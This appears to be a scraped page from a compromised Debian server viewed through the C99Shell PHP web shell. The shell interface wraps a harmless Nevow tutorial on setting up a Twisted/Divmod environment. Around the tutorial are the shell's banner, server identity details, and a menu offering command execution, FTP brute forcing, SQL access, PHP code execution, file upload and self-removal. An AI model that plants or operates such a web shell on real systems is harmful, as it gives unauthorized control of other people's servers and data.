!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.16 (Debian). PHP/5.3.3-7+squeeze19 

uname -a: Linux mail.tri-specialutilitydistrict.com 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC
2014 x86_64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/doc/python-nevow/howto/chattutorial/   drwxr-xr-x
Free 129.82 GB of 142.11 GB (91.35%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     env.html (3.86 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Nevow: Setting up an Environment

Setting up an Environment

Install

To run this tutorial, you need to have nevow available to python and you'll need the files in the doc/howto tree. You don't even have to install nevow; the examples will run within the source tree.

Combinator: The Divmod Way

Using SVN with Combinator is the best way to try out the example code in-place (and hop between other SVN branches in the future). This is how we develop and test our applications at Divmod. If you have a system installation of Twisted that you don't want to update or interfere with, you can use this method without installing anything.

  1. Create a projects directory or change to some other test directory of your choice:
    $ mkdir ~/Projects
    $ cd ~/Projects
    
  2. If you don't have the twisted library, check it out now:
    $ svn co svn://svn.twistedmatrix.com/svn/Twisted/trunk Twisted/trunk
    
  3. Then get Combinator and Nevow (and the rest of Divmod). See the Combinator Tutorial for more about these special checkout paths.
    $ svn co http://divmod.org/svn/Divmod/trunk Divmod/trunk
    
  4. Set up the Combinator environment in this shell. You'll need this step in any future test shells since it adjusts PATH and PYTHONPATH:
    $ eval `python Divmod/trunk/Combinator/environment.py`
    (some "link:" lines are normal)
    
  5. Register both the Twisted and Divmod (and thus Nevow+Athena) codebases with Combinator:
    $ chbranch Twisted trunk
    $ chbranch Divmod trunk
    
  6. You can check to see if your environment is ready to go by running the tutorial tests (from any directory, after executing the previous command):
    $ trial nevow.test.test_howtolistings
    
    If they all pass, you're ready to begin the tutorial.

Standard distutils Installation

If you don't want to manage branches and environments with Combinator, you can install our code in the standard site-packages directory. You'll still need the source tree so you can use the files in doc/howto.

For those that would prefer the old way, here's how you do it:

  1. Create a projects directory:
    $ mkdir ~/Projects
    $ cd ~/Projects
    
  2. Checkout and install the latest Twisted:
    $ svn co svn://svn.twistedmatrix.com/svn/Twisted/trunk Twisted
    $ cd Twisted
    $ sudo python setup.py install
    $ cd ../
    
  3. Checkout and install Nevow:
    $ svn co http://divmod.org/svn/Divmod/trunk/Nevow Nevow
    $ cd Nevow
    $ sudo python setup.py install
    $ cd ../
    

Index

Version:

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0067 ]--